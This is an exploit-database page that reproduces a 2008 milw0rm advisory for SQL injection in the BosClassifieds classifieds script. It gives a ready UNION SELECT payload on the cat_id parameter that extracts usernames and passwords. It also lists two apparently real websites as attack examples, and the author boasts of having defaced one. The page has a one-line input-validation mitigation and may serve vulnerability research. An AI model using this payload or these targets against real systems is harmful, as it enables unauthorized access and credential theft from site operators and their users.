header-logo
Suggest Exploit
vendor:
BosClassifieds
by:
ZoRLu
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: BosClassifieds
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Powered by BosClassifieds remote sql inj

An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable application. This can be done by appending the malicious SQL query to the vulnerable parameter in the URL. For example, an attacker can send the following URL to the vulnerable application: http://localhost/script_path/index.php?cat_id=[SQL]. Where [SQL]= -9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

[~] Powered by BosClassifieds remote sql inj
[~]
[~] index.php (catid_id)
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 03.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] 
[~] N0T: a.q kpss yuzden nete ara verebilirim : (
[~]
[~] -----------------------------------------------------------

Exploit:

http://localhost/script_path/index.php?cat_id=[SQL]

[SQL]=

-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--

example 1: ( you must look title )

http://myvaldosta.com/bosclass/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--

( bunu ben hackledim canIm sIkILIyodu : ) anasayfayI kontrol edin http://myvaldosta.com )

example 2: ( you must look title )

http://wikiventa.com/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-03]

Navigation

Suggest Exploit

Services By CQR